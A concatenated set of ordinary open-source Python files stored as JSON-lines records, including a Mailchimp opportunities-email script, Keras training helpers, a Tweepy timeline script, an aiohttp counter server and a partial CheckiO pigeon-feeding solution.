days. This can be overrriden as described above.\n\n For testing purposes, you can override the list ID so you can send it to yourself only as\n we have set up a testing list with ID \"096e52cebb\"\n\n If you only need to send opportunities for one lot rather than all of them, you can also do this via the command\n line. Note, this may come in useful if the script was to fail halfway and you wish to continue from the lot which\n failed.\n\nUsage:\n send-dos-opportunities-email.py \n [--number_of_days=] [--list_id=] [--lot_slug=]\n\nExample:\n send-dos-opportunities-email.py\n preview user@gds.gov.uk 7483crh87h34c3 digital-outcomes-and-specialists-3\n --number_of_days=3 --list_id=988972hse --lot_slug=digital-outcomes\n\"\"\"\n\nimport sys\n\nfrom datetime import date\n\nfrom docopt import docopt\nfrom dmapiclient import DataAPIClient\n\nsys.path.insert(0, '.')\nfrom dmscripts.helpers.auth_helpers import get_auth_token\nfrom dmscripts.send_dos_opportunities_email import main\nfrom dmscripts.helpers import logging_helpers\nfrom dmutils.email.dm_mailchimp import DMMailChimpClient\nfrom dmutils.env_helpers import get_api_endpoint_from_stage\n\n\nlogger = logging_helpers.configure_logger()\n\n\nlist_ids = {\n 'digital-outcomes-and-specialists-2': {\n 'digital-specialists': \"30ba9fdf39\",\n 'digital-outcomes': \"97952fee38\",\n 'user-research-participants': \"e6b93a3bce\",\n },\n 'digital-outcomes-and-specialists-3': {\n 'digital-specialists': \"bee802d641\",\n 'digital-outcomes': \"5c92c78a78\",\n 'user-research-participants': \"34ebe0bffa\",\n }\n}\n\nif __name__ == \"__main__\":\n arguments = docopt(__doc__)\n framework_slug = arguments['']\n lots = [\n {\n \"lot_slug\": \"digital-specialists\",\n \"lot_name\": \"Digital specialists\",\n \"list_id\": list_ids[framework_slug]['digital-specialists']\n },\n {\n \"lot_slug\": \"digital-outcomes\",\n \"lot_name\": \"Digital outcomes\",\n \"list_id\": list_ids[framework_slug]['digital-outcomes']\n },\n {\n \"lot_slug\": \"user-research-participants\",\n \"lot_name\": \"User research participants\",\n \"list_id\": list_ids[framework_slug]['user-research-participants']\n }\n ]\n\n # Override number of days\n if arguments.get(\"--number_of_days\"):\n number_of_days = int(arguments['--number_of_days'])\n else:\n day_of_week = date.today().weekday()\n if day_of_week == 0:\n number_of_days = 3 # If Monday, then 3 days of briefs\n else:\n number_of_days = 1\n\n # Override list for non-production environment\n if arguments[''] != \"production\":\n logger.info(\n \"The environment is not production. Emails will be sent to test list unless you set the list id manually.\"\n )\n for lot in lots:\n lot.update({\"list_id\": \"096e52cebb\"})\n\n # Override list id\n if arguments.get(\"--list_id\"):\n for lot in lots:\n lot.update({\"list_id\": arguments[\"--list_id\"]})\n\n # Override lot\n if arguments.get(\"--lot_slug\"):\n lots = [lot for lot in lots if lot[\"lot_slug\"] == arguments[\"--lot_slug\"]]\n\n api_url = get_api_endpoint_from_stage(arguments[''])\n data_api_client = DataAPIClient(api_url, get_auth_token('api', arguments['']))\n\n dm_mailchimp_client = DMMailChimpClient(arguments[''], arguments[''], logger)\n\n for lot_data in lots:\n ok = main(\n data_api_client=data_api_client,\n mailchimp_client=dm_mailchimp_client,\n lot_data=lot_data,\n number_of_days=number_of_days,\n framework_slug=framework_slug,\n )\n if not ok:\n sys.exit(1)\n","sub_path":"scripts/send-dos-opportunities-email.py","file_name":"send-dos-opportunities-email.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"103726658","text":"# coding=utf-8\nimport os\n\n\n# 读取目录下所有视频的路径,返回一个list\ndef findAllVideos(root_dir):\n paths = []\n # 遍历\n for parent, dirname, filenames in os.walk(root_dir):\n for filename in filenames:\n # 这里只选择了两种最常用的视频格式\n if filename.endswith(\".mp4\") or filename.endswith(\".avi\") or filename.endswith(\".MP4\") or filename.endswith(\".AVI\"):\n paths.append(parent + \"\\\\\" + filename)\n return paths\n\n\n# 用户指定目录\nroot_dir = input(\"Input the parent path of videos:\\n\")\n\npaths = findAllVideos(root_dir)\n\nfor i in range(paths.__len__()):\n print(\"Video\", (i + 1), \"/\", paths.__len__().__str__())\n command = \"python preview_py3.py \" + '\"' + paths[i] + '\"' + \" 400 \" + (i + 1).__str__() + \".jpg\"\n print(command)\n os.system(command)\n print(\"\\n\")\n","sub_path":"bash_py3.py","file_name":"bash_py3.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"215747101","text":"import pandas as pd\nimport numpy as np\nfrom src.feature_engineering import feature_engineering\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef main():\n X_train, y_train, scaler = prepare_data()\n result = rf_grid_search(np.array(X_train), np.array(y_train).ravel())\n print(result.best_params_, result.best_score_)\n\n\ndef rf_grid_search(X, y):\n parameters = {'n_estimators': [300],\n 'max_features': ['auto', 'sqrt', 'log2'],\n 'max_depth': [None, 3, 5, 10],\n 'min_samples_split': [2, 3],\n 'min_samples_leaf': [1, 2, 3]\n }\n\n rf = RandomForestClassifier()\n clf = GridSearchCV(rf, parameters, scoring='recall', cv=10, verbose=True)\n clf.fit(X, y)\n\n return clf\n\n\ndef prepare_data():\n '''\n Load the data, perform feature engineering, standardize, train/test split\n '''\n df = pd.read_json('data/data.json')\n df = feature_engineering(df)\n\n y = df['fraud']\n X = df.drop('fraud', axis=1)\n\n cols = [ # 'acct_type',\n # 'approx_payout_date',\n 'body_length',\n 'channels',\n # 'country',\n # 'currency',\n # 'delivery_method', (text)\n # 'description', (text)\n # 'email_domain', (text)\n # 'event_created',\n # 'event_end',\n # 'event_published',\n # 'event_start',\n 'fb_published',\n # 'gts',\n 'has_analytics',\n # 'has_header', (has NaNs, needs cleaning)\n 'has_logo',\n 'listed',\n # 'name', (text)\n 'name_length',\n # 'num_order', (transaction)\n # 'num_payouts', (transaction)\n # 'object_id',\n # 'org_desc', (text, Rohit doing NLP )\n # 'org_facebook', (not sure what this is)\n # 'org_name', (text)\n # 'org_twitter', (not sure what this is)\n # 'payee_name', (transaction)\n # 'payout_type', (transaction)\n # 'previous_payouts', (dictionaries)\n # 'sale_duration', (not sure what this is)\n # 'sale_duration2', (not sure what this is)\n 'show_map',\n # 'ticket_types', (feature engineered)\n # 'user_age', (feature engineered)\n # 'user_created',\n # 'user_type',\n # 'venue_address',\n # 'venue_country',\n # 'venue_latitude',\n # 'venue_longitude',\n # 'venue_name',\n # 'venue_state',\n # 'fraud', (feature engineered target)\n 'event_published_dummy',\n # 'approx_payout_date_dt',\n # 'event_created_dt',\n # 'event_end_dt',\n # 'event_start_dt',\n # 'approx_payout_date_hour',\n 'event_created_hour',\n 'event_end_hour',\n 'event_start_hour',\n 'previous_payouts?',\n 'payout_type?',\n 'org_blacklist',\n 'user_age_90',\n 'num_links',\n 'fraud_email_domain',\n 'fraud_venue_country',\n 'fraud_country',\n 'fraud_currency',\n 'total_price',\n 'max_price',\n 'num_tiers']\n\n X_train = df[cols]\n y_train = y\n\n scaler = StandardScaler()\n X_train = pd.DataFrame(scaler.fit_transform(X_train), columns=cols)\n\n return X_train, y_train, scaler\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/random_forest_grid_search.py","file_name":"random_forest_grid_search.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"617730030","text":"from __future__ import print_function\n\n\"\"\"\nExtra set of callbacks.\n\"\"\"\n\nimport random\nimport warnings\nimport numpy as np\nimport logging\n\nfrom keras.callbacks import Callback as KerasCallback\n\n\n###\n# Storing callbacks\n###\nclass StoreModelWeightsOnEpochEnd(KerasCallback):\n def __init__(self, model, fun, epochs_for_save, reload_epoch=0, verbose=0):\n \"\"\"\n In:\n model - model to save\n fun - function for saving the model\n epochs_for_save - number of epochs before the last save\n reload_epoch - number of the epochs trained (only if resuming training)\n \"\"\"\n super(KerasCallback, self).__init__()\n self.model_to_save = model\n self.store_function = fun\n self.epochs_for_save = epochs_for_save\n self.reload_epoch = reload_epoch\n self.verbose = verbose\n\n def on_epoch_end(self, epoch, logs={}):\n epoch += 1\n if(epoch%self.epochs_for_save==0):\n print('')\n self.store_function(self.model_to_save, epoch+self.reload_epoch)\n###\n\n###\n# Printing callbacks\n###\n\n\n\n \n###\n\n###\n# Learning modifiers callbacks\n###\nclass LearningRateReducerWithEarlyStopping(KerasCallback):\n \"\"\"\n Reduces learning rate during the training.\n\n Original work: jiumem [https://github.com/jiumem]\n \"\"\"\n def __init__(self, \n patience=0, lr_decay=1, reduce_rate=0.5, reduce_nb=10, \n is_early_stopping=True, verbose=1):\n \"\"\"\n In:\n patience - number of beginning epochs without reduction; \n by default 0\n lr_decay - minimum number of epochs passed before the last reduction\n reduce_rate - multiplicative rate reducer; by default 0.5\n reduce_nb - maximal number of reductions performed; by default 10\n is_early_stopping - if true then early stopping is applied when\n reduce_nb is reached; by default True\n verbose - verbosity level; by default 1\n \"\"\"\n super(KerasCallback, self).__init__()\n self.patience = patience\n self.wait = 0\n self.best_score = -1.\n self.reduce_rate = reduce_rate\n self.current_reduce_nb = 0\n self.reduce_nb = reduce_nb\n self.is_early_stopping = is_early_stopping\n self.verbose = verbose\n self.epsilon = 0.1e-10\n self.lr_decay = lr_decay\n\n def on_epoch_end(self, epoch, logs={}):\n current_score = logs.get('val_acc')\n if current_score is None:\n warnings.warn('validation score is off; ' + \n 'this reducer works only with the validation score on')\n return\n if current_score > self.best_score:\n self.best_score = current_score\n self.wait = 0\n if self.verbose > 0:\n logging.info('---current best val accuracy: %.3f' % current_score)\n else:\n if self.wait >= self.patience and self.wait >= self.lr_decay:\n self.current_reduce_nb += 1\n if self.current_reduce_nb <= self.reduce_nb:\n lr = self.model.optimizer.lr.get_value()\n self.model.optimizer.lr.set_value(np.float32(lr*self.reduce_rate))\n if self.verbose > 0:\n logging.info(\"LR reduction from {0:0.6f} to {1:0.6f}\".\\\n format(float(lr), float(lr*self.reduce_rate)))\n if float(lr) <= self.epsilon:\n if self.verbose > 0:\n logging.info('Learning rate too small, learning stops now')\n self.model.stop_training = True\n else:\n if self.is_early_stopping:\n if self.verbose > 0:\n logging.info(\"Epoch %d: early stopping\" % (epoch))\n self.model.stop_training = True\n self.wait += 1 \n","sub_path":"keras_wrapper/callbacks_keras_wrapper.py","file_name":"callbacks_keras_wrapper.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"349793245","text":"# 1.0 - Acer 2017/05/17 17:06\n# 2.0 - Acer 2017/11/24 15:51\nimport copy\nimport os\nimport time\nfrom collections import Iterable\nfrom functools import reduce\nfrom subprocess import Popen\n\nimport numpy as np\nfrom keras.callbacks import CSVLogger, ModelCheckpoint\nfrom keras.models import load_model\nfrom keras.utils import vis_utils\n\nimport acerlib.shelve_ext as she\nfrom acerlib import print_ext\n\n\n# ============================================================================ #\n# Common Functions #\n# ============================================================================ #\ndef check_and_create_path(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\n\n# ============================================================================ #\n# TenserFlow Control #\n# ============================================================================ #\ndef setTensorFlowGpuMemory(ratio):\n import tensorflow as tf\n import keras.backend.tensorflow_backend as KTF\n\n num_threads = os.environ.get('OMP_NUM_THREADS')\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=ratio)\n\n if num_threads:\n sessionInfo = tf.Session(config=tf.ConfigProto(\n gpu_options=gpu_options, intra_op_parallelism_threads=num_threads))\n else:\n sessionInfo = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n\n KTF.set_session(sessionInfo)\n\n\n# ============================================================================ #\n# Plot #\n# ============================================================================ #\ndef plot_model(m, filename='temp_modelplot.png'):\n import matplotlib.image as mpimg\n import matplotlib.pyplot as plt\n\n vis_utils.plot_model(m, show_shapes=True, to_file=filename)\n filename = 'temp_modelplot.png'\n\n img = mpimg.imread(filename)\n try:\n Popen(['eog', filename])\n except:\n plt.imshow(img)\n\n # --- back up ---\n # img = Image.open(fName)\n # img.show()\n # --------------\n\n\n# ============================================================================ #\n# Command line display #\n# ============================================================================ #\ndef print_trainProgress(iEpoch, iBatch, loss):\n print('Epoch', iEpoch, 'Batch', iBatch, 'loss =', loss, sep='\\t')\n\n\ndef print_evalProgress(iEpoch, iBatch, loss):\n print('Epoch', iEpoch, 'Batch', iBatch, 'val_loss =', loss, sep='\\t')\n\n\ndef print_loss(iEpoch, iBatch, loss, numFormat='.3e'):\n \"\"\"\n :param iEpoch: \n :param iBatch: \n :param loss: can be number or dict\n :param numFormat: \n :return: \n \"\"\"\n print('Epoch %d Batch %d' % (iEpoch, iBatch), end=\"\")\n print('\\t', end=\"\")\n if isinstance(loss, dict):\n print_ext.print_dict(loss, numFormat)\n print('')\n elif isinstance(loss, Iterable):\n print('loss: ', end='')\n\n for x in loss:\n print('%.3e\\t' % x, end='')\n print('')\n else:\n print(('loss: %' + '.3e') % loss)\n\n\n# ============================================================================ #\n# Data Processing #\n# ============================================================================ #\ndef batchGenerator(d, batch_size, isLooping=True):\n \"\"\"\n Make batch generator\n :param d: multidimantional data\n :param batch_size: \n :param isLooping: \n \"\"\"\n nSample = d[0].shape[0] if isinstance(d, (list, tuple)) else d.shape[0]\n c1 = 0\n while True:\n if isinstance(d, (list, tuple)):\n d_batch = [np.take(x, range(c1, c1 + batch_size), axis=0) for x in d]\n else:\n d_batch = np.take(d, range(c1, c1 + batch_size), axis=0)\n yield d_batch, range(c1, c1 + batch_size)\n\n if (c1 + 2 * batch_size) > nSample:\n if isLooping:\n c1 = 0\n else:\n break\n else:\n c1 += batch_size\n\n\n# ============================================================================ #\n# Model Construction #\n# ============================================================================ #\ndef stackLayers(layers):\n return reduce((lambda x, y: y(x)), layers)\n\n\n# ============================================================================ #\n# Controller #\n# ============================================================================ #\nclass ModelController:\n def __init__(self, m, path='pipeline_temp', ID=None):\n # create data folder\n self.m = m\n self.path = path\n self.history = {'history': [], 'loss_train': [], 'loss_valid': []}\n self.loss_best = np.inf\n\n if ID is None:\n self.id = 'p' + time.strftime(\"%Y%d%d_%H%M%S\")\n else:\n self.id = ID\n\n check_and_create_path(path)\n\n def save_m(self, fName=None):\n if fName is None:\n fName = os.path.join(self.path, '%s_m' % self.id)\n self.m.save(fName)\n print('model saved')\n\n def save_m_best(self, newLoss):\n if newLoss < self.loss_best:\n self.loss_best = newLoss\n fName = os.path.join(self.path, '%s_m_best' % self.id)\n self.m.save(fName)\n print('New model saved')\n isSaveNew = 1\n else:\n isSaveNew = 0\n return isSaveNew\n\n def plot_m(self):\n filename = os.path.join(self.path, '%s_plot_m.png' % self.id)\n plot_model(self.m, filename)\n\n def genDefaultCallbacks(self, isSaveBestModel=True, isLogCSV=True, isSaveModel=True):\n callbacks = []\n\n # save the best model\n if isSaveBestModel:\n fName = os.path.join(self.path, '%s_CModelCheckpoint_best.hdf5' % self.id)\n cb_ModelCheckpoint_best = ModelCheckpoint(fName, monitor='val_loss', save_best_only=True)\n callbacks.append(cb_ModelCheckpoint_best)\n\n # log history\n if isLogCSV:\n fName = os.path.join(self.path, '%s_CSVLogger.csv' % self.id)\n cb_CSVLogger = CSVLogger(fName)\n callbacks.append(cb_CSVLogger)\n\n # save all model history\n if isSaveModel:\n pathName = os.path.join(self.path, 'model_history_%s' % self.id)\n check_and_create_path(pathName)\n fName = os.path.join(pathName, '%s_CModelCheckpoint_{epoch:04d}.hdf5' % self.id)\n cb_ModelCheckpoint = ModelCheckpoint(fName, monitor='val_loss')\n callbacks.append(cb_ModelCheckpoint)\n\n return callbacks\n\n\nclass Pipeline:\n # ============================================================================ #\n # Initialise #\n # ============================================================================ #\n def __init__(self, path='pipeline_temp', ID=None):\n if ID is None:\n ID = 'p' + time.strftime(\"%Y%d%d_%H%M%S\")\n self.ID = ID\n # create data folder\n self.path = path\n self.check_and_create_path()\n\n # data\n self.d_train = None # should be a list [X, Y]\n self.d_test = None # should be a list [X, Y]\n self.d_valid = None # should be a list [X, Y]\n\n # model\n self.m = None\n\n # fitting\n self.history = None\n\n # ============================================================================ #\n # High Level Functions #\n # ============================================================================ #\n # Training ------------------------------------------------------------------- #\n def fit(self, batch_size=32, epochs=10, callbacks=None, validation_split=0.0, useValidation_data=True):\n if callbacks is None:\n callbacks = self.defaultCallbacks()\n if useValidation_data:\n d_valid = self.d_valid\n else:\n d_valid = None\n self.history = self.m.fit(self.d_train[0], self.d_train[1],\n batch_size=batch_size,\n epochs=epochs,\n callbacks=callbacks,\n validation_split=validation_split,\n validation_data=d_valid)\n\n # ============================================================================ #\n # Plot #\n # ============================================================================ #\n def plot_m(self):\n import matplotlib.image as mpimg\n import matplotlib.pyplot as plt\n\n fName = os.path.join(self.path, '%s_plot_m.png' % self.ID)\n vis_utils.plot_model(self.m, show_shapes=True, to_file=fName)\n img = mpimg.imread(fName)\n try:\n Popen(['eog', fName])\n except:\n plt.imshow(img)\n\n def plot_history(self):\n import matplotlib.pyplot as plt\n\n fName = os.path.join(self.path, '%s_CSVLogger.csv' % self.ID)\n history = np.loadtxt(fName, skiprows=1, delimiter=',')\n plt.ion()\n plt.figure(figsize=(13, 5))\n plt.plot(history[:, 1], label=\"training\")\n plt.plot(history[:, 2], label=\"validation\")\n plt.legend()\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n\n # ============================================================================ #\n # callback #\n # ============================================================================ #\n def defaultCallbacks(self):\n\n # save the best model\n fName = os.path.join(self.path, '%s_CModelCheckpoint_best.hdf5' % self.ID)\n cb_ModelCheckpoint_best = ModelCheckpoint(fName, monitor='val_loss', save_best_only=True)\n\n # log history\n fName = os.path.join(self.path, '%s_CSVLogger.csv' % self.ID)\n cb_CSVLogger = CSVLogger(fName)\n\n # save all model history\n pathName = os.path.join(self.path, 'model_history_%s' % self.ID)\n self.check_and_create_path(pathName)\n\n fName = os.path.join(pathName, '%s_CModelCheckpoint_{epoch:04d}.hdf5' % self.ID)\n cb_ModelCheckpoint = ModelCheckpoint(fName, monitor='val_loss')\n\n return [cb_ModelCheckpoint_best, cb_CSVLogger, cb_ModelCheckpoint]\n\n # ============================================================================ #\n # File I/O #\n # ============================================================================ #\n def load(self, m=True, d_train=True, d_test=True, d_valid=True):\n funMappting = {'m': [m, self.load_m],\n 'd_train': [d_train, self.load_d_train],\n 'd_test': [d_test, self.load_d_test],\n 'd_valid': [d_valid, self.load_d_valid]}\n for key, fun in funMappting.items():\n try:\n if fun[0]:\n fun[1]()\n print('')\n except Exception as e:\n print(e)\n print(key + ': not loaded\\n')\n print('')\n\n def save(self, m=True, d_train=True, d_test=True, d_valid=True):\n funMappting = {'m': [m, self.save_m],\n 'd_train': [d_train, self.save_d_train],\n 'd_test': [d_test, self.save_d_test],\n 'd_valid': [d_valid, self.save_d_valid]}\n for key, fun in funMappting.items():\n try:\n if fun[0]: # if data exist, then save\n if getattr(self, key) is not None:\n fun[1]() # run save funciton\n print('')\n except Exception as e:\n print(e)\n print(key + ': not saved\\n')\n print('')\n self.save_pipeline()\n\n def read_d(self, d_train=True, d_test=True, d_valid=True):\n funMappting = {'d_train': [d_train, self.read_d_train],\n 'd_test': [d_test, self.read_d_test],\n 'd_valid': [d_valid, self.read_d_valid]}\n for key, fun in funMappting.items():\n try:\n if fun[0]:\n fun[1]()\n print('')\n except Exception as e:\n print(e)\n print(key + ': not read\\n')\n print('')\n\n # ============================================================================ #\n # Low-level File I/O #\n # ============================================================================ #\n\n # save ----------------------------------------------------------------------- #\n def save_d_train(self):\n fName = os.path.join(self.path, '%s_d_train.npz' % self.ID)\n np.savez(fName, *self.d_train)\n print('training data saved')\n\n def save_d_valid(self):\n fName = os.path.join(self.path, '%s_d_valid.npz' % self.ID)\n np.savez(fName, *self.d_valid)\n print('validation data saved')\n\n def save_d_test(self):\n fName = os.path.join(self.path, '%s_d_test.npz' % self.ID)\n np.savez(fName, *self.d_test)\n print('testing data saved')\n\n def save_m(self):\n fName = os.path.join(self.path, '%s_m' % self.ID)\n self.m.save(fName)\n print('model saved')\n\n def save_pipeline(self):\n ps = copy.copy(self)\n ps.d_train = []\n ps.d_test = []\n ps.d_valid = []\n ps.m = []\n\n fName = os.path.join(self.path, '%s_pipeline' % self.ID)\n she.save(fName, 'pipeline', ps)\n print('Pipeline saved')\n\n # load ----------------------------------------------------------------------- #\n def load_d_train(self):\n fName = os.path.join(self.path, '%s_d_train.npz' % self.ID)\n d = np.load(fName)\n d.files.sort()\n self.d_train = [d[vName] for vName in d.files]\n print('trainig data loaded')\n\n def load_d_test(self):\n fName = os.path.join(self.path, '%s_d_test.npz' % self.ID)\n d = np.load(fName)\n d.files.sort()\n self.d_test = [d[vName] for vName in d.files]\n print('testing data loaded')\n\n def load_d_valid(self):\n fName = os.path.join(self.path, '%s_d_valid.npz' % self.ID)\n d = np.load(fName)\n d.files.sort()\n self.d_valid = [d[vName] for vName in d.files]\n print('validation data loaded')\n\n def load_m(self):\n fName = os.path.join(self.path, '%s_m' % self.ID)\n load_model(fName)\n print('model loaded')\n\n # ============================================================================ #\n # Utilities #\n # ============================================================================ #\n def check_and_create_path(self, path=None):\n if path is None:\n path = self.path\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef load_pipeline(fName):\n p = she.load(fName, 'pipeline')\n p.load()\n return p\n\n\ndef load_pipeline_withBestModel(fName):\n p = she.load(fName, 'pipeline')\n p.load()\n fName = os.path.join(p.path, '%s_CModelCheckpoint_best.hdf5' % p.id)\n p.m = load_model(fName)\n return p\n","sub_path":"keras_ext.py","file_name":"keras_ext.py","file_ext":"py","file_size_in_byte":15728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"128716874","text":"#!/usr/bin/env python\nimport tweepy\n\nfrom keys1 import API_KEY, API_SECRET, TOKEN_KEY, TOKEN_SECRET, ACCOUNT\n\nauth = tweepy.OAuthHandler(API_KEY, API_SECRET)\nauth.set_access_token(TOKEN_KEY, TOKEN_SECRET)\napi = tweepy.API(auth)\n\n\ndef print_tweet(tweet):\n print(\"%i\\t%s\\t%s\" %\n (tweet.id,\n tweet.user.name.ljust(20),\n tweet.text.replace('&', '$')\n .replace('\\n', ' ')\n .replace('\\a', ' ')\n .replace('\\t', ' ')\n .replace(' *', ' ')))\n\n\ndef print_user(user):\n print(\"%i\\t%s\\t%s\\t%s\\t%s\" %\n (user.id,\n user.name,\n user.screen_name,\n user.description.replace('&', '&')\n .replace('\\n', ' ')\n .replace('\\r', ' ')\n .replace('\\t', ' ')\n .replace(' *', ' '),\n user.location))\n\n\ndef home_timeline():\n for tweet in api.home_timeline(count=100):\n if not tweet.text.startswith(\"RT\"):\n print_tweet(tweet)\n\n\ndef user_timeline(user):\n for tweet in api.user_timeline(user):\n if not tweet.text.startswith(\"RT\"):\n print_tweet(tweet)\n\n\ndef search_user(query):\n for user in api.search_users(q=query):\n print_user(user)\n\n\ndef list_followers():\n followers = []\n for user in api.followers():\n print_user(user)\n followers.append(user.id)\n return followers\n\n\ndef list_friends():\n friends = []\n for id in api.friends_ids():\n friend = api.get_user(id)\n print_user(friend)\n friends.append(friend.id)\n return friends\n\n\ndef list_timelines():\n for list in api.lists_all():\n print(\"%s %s\" % (list.name, list.id))\n for member in api.list_members(list_id=list.id):\n print('-' + member.name)\n for tweet in api.list_timeline(list_id=list.id):\n if not tweet.text.startswith(\"RT\"):\n print_tweet(tweet)\n\n\ndef list_list(lid):\n members = []\n for member in api.list_members(list_id=lid):\n print_user(member)\n members.append(member.id)\n return members\n\n\ndef add_to_list(lid, users):\n for user in users:\n api.add_list_member(list_id=lid, user_id=user)\n\n\ndef remove_from_list(lid, users):\n for user in users:\n try:\n api.remove_list_member(list_id=lid, user_id=user)\n except:\n print(user)\n\n\nprint(ACCOUNT)\nlist_friends()\nprint()\nlist_followers()\n\nprint('------')\n\nfrom keys1 import API_KEY, API_SECRET, TOKEN_KEY, TOKEN_SECRET\n\nauth = tweepy.OAuthHandler(API_KEY, API_SECRET)\nauth.set_access_token(TOKEN_KEY, TOKEN_SECRET)\napi = tweepy.API(auth)\n\nlist_friends()\nprint()\nlist_followers()\n","sub_path":"twitter/tweepy_timelines.py","file_name":"tweepy_timelines.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"158662441","text":"# Copyright (C) 2008 by Jes Frellsen, Ida Moltke and Martin Thiim\n# This code is part of the Biopython distribution and governed by its\n# license. Please see the LICENSE file that should have been included\n# as part of this package.\n\nimport numpy\nfrom numpy import array, zeros, ones\nfrom model import angle_id_pos, angle_pos, num_nodes, num_angles\n\n\n########## FUNCTION FOR MAKING DATA AND MISMASKS ##########\nangle_ids = [0.0, 1.0, 2.0, 6.0, 3.0, 4.0, 5.0]\n\ndef make_data_and_mism(len_nucs):\n \"\"\"\n Make a sequence and a mismask for model of length 'len_nucs'\n \"\"\"\n len_angles = len_nucs*num_angles\n\n data = zeros((len_angles, num_nodes))\n mism_sample = ones((len_angles, num_nodes), dtype=numpy.uint)\n mism = ones((len_angles, num_nodes), dtype=numpy.uint)\n\n # Set the angle IDs\n data[:,angle_id_pos] = array(angle_ids*len_nucs)\n mism_sample[:,angle_id_pos] = 0\n \n mism[:,angle_id_pos] = 0\n mism[:,angle_pos] = 0\n\n return data, mism_sample, mism\n \n\n########## FUNCTION FOR CONVERTING DATA INTO AN ANGLELIST ##########\n\ndef data_to_anglelist(data):\n length = data.shape[0]\n angle_list = map(lambda l: tuple(map(float, list(l))), data[:,angle_pos].reshape((length/7,7))[:,(0,1,2,4,5,6,3)])\n return angle_list\n","sub_path":"Bio/PDB/Barnacle/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"406273437","text":"#!/usr/local/bin/python3.5\nimport asyncio\nfrom datetime import datetime\nfrom aiohttp import web\nfrom aiohttp.web import View\nimport random\nfrom jinja2 import Template\n\nreq_count = 0\nreq_num = 0\n\nasync def print_count_info():\n while True:\n #import pdb; pdb.set_trace()\n print(\"Total Reqs:%s, ReqNum:%s\" % (req_count,req_num))\n await asyncio.sleep(4)\n\nasync def collect_data(request):\n global req_count, req_num\n jsdata = await request.json()\n print(\"jsdata:\",jsdata)\n #import pdb; pdb.set_trace()\n #req_num = request.query.get('reqnum')\n req_num = jsdata.get('count')\n #print(\"ReqNum:%s\" % (req_num))\n headers = {\"content_type\": \"text/html\", \"test\": \"YT\"}\n response = web.Response(body='ytest...', headers=headers)\n req_count += 1\n return response\n\nasync def info(request):\n global req_count, req_num\n #import pdb; pdb.set_trace()\n if(request.method == 'POST'):\n try:\n jsdata = await request.json()\n if(jsdata.get('action') == 'reset'):\n req_count = req_num = 0\n except Exception as e:\n print(\"Exception:%s\" % e)\n headers = {\"Content-Type\": \"text/html\", \"charset\": \"utf-8\"}\n tpl = '''\n \n

{{ name }}

\n \n \n '''\n template = Template(tpl)\n #raw_html = template.render(name='YT')\n form = '''
'''\n raw_html = \"

test

Total Reqs:%s, ReqNum:%s
%s\" % (req_count,req_num,form)\n response = web.Response(body=raw_html, headers=headers)\n return response\n\n\ndef main():\n asyncio.ensure_future(print_count_info())\n app = web.Application()\n app.router.add_route(\"POST\", \"/test\", collect_data)\n app.router.add_route(\"GET\", \"/info\", info)\n app.router.add_route(\"POST\", \"/info\", info)\n\n loop = asyncio.get_event_loop()\n try:\n web.run_app(app)\n loop.run_forever()\n except KeyboardInterrupt as e:\n print(\"KeyboardInterrupt, cancel tasks...\")\n print(asyncio.gather(*asyncio.Task.all_tasks()).cancel())\n loop.stop()\n loop.run_forever()\n finally:\n loop.run_until_complete(asyncio.sleep(0))\n loop.close()\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/Demo/Async/PyRunner/master_debug.py","file_name":"master_debug.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"489339853","text":"#-------------------------------------------------------------------------------\n# -*- coding: utf-8 -*-\n# Feed Pigeons: 少なくとも一つ餌を食べれるハトの数は?\n#\n# 【ルール】\n# ハトに餌をやる。1分毎にハトがやってきて、その数は変動する。\n# 1分目は1匹、2分目には2匹、・・・、N分目にはN匹、新しいハトがやってくる。\n# 一度来たハトは、飛び去ることはない。\n# 新しいハトがやってきた時は、前からいたハトから餌を食べる。\n#\n# 【入力】\n# N 餌の数が数値で入力される。0 < N < 10^5\n#\n# 【出力】\n# 少なくとも一つ餌を食べれるハトの数を、数値で出力せよ。\n#\n#-------------------------------------------------------------------------------\n\n# 【方針】\n# 全てのハトに餌が与えられるのがN分目の時まで、whileで回し続ける。\n# あとはN + 1分目の時に、どれだけ餌が与えられるかを考慮すれば良い。\n\ndef checkio(number):\n\n # 餌付け1分目の値\n pegeonAllNum = 1 # 全ハト数\n pegeonInc = 1 # ハトの増加量\n feed = 1 # N回目に全ハトに必要な餌量\n pegeonCount = 0 # N回目までの、餌付け完了したハト数\n\n # N分目の全てのハトに餌が行き渡る場合、\n # すなわち、残っている餌の手持ちnumber - N回目で必要な餌量feed > 0の場合。\n while number - feed > 0:\n pegeonCount += pegeonInc # ハトの増加量分だけカウント\n number -= pegeonAllNum # 餌の総量から全ハト数を引く\n\n # 後判定のための処理\n pegeonInc += 1 # N + 1分目のハトの増加量\n pegeonAllNum += pegeonInc # N + 1分目の全ハト数\n feed = pegeonAllNum # N + 1分目に必要な餌量\n\n\n pegeonAllNum -= pegeonInc # N分目までの全ハト数\n # N + 1分目で、新たに来たハトに対して餌を与えられる場合、\n # すなわち餌の手持ちnumber - 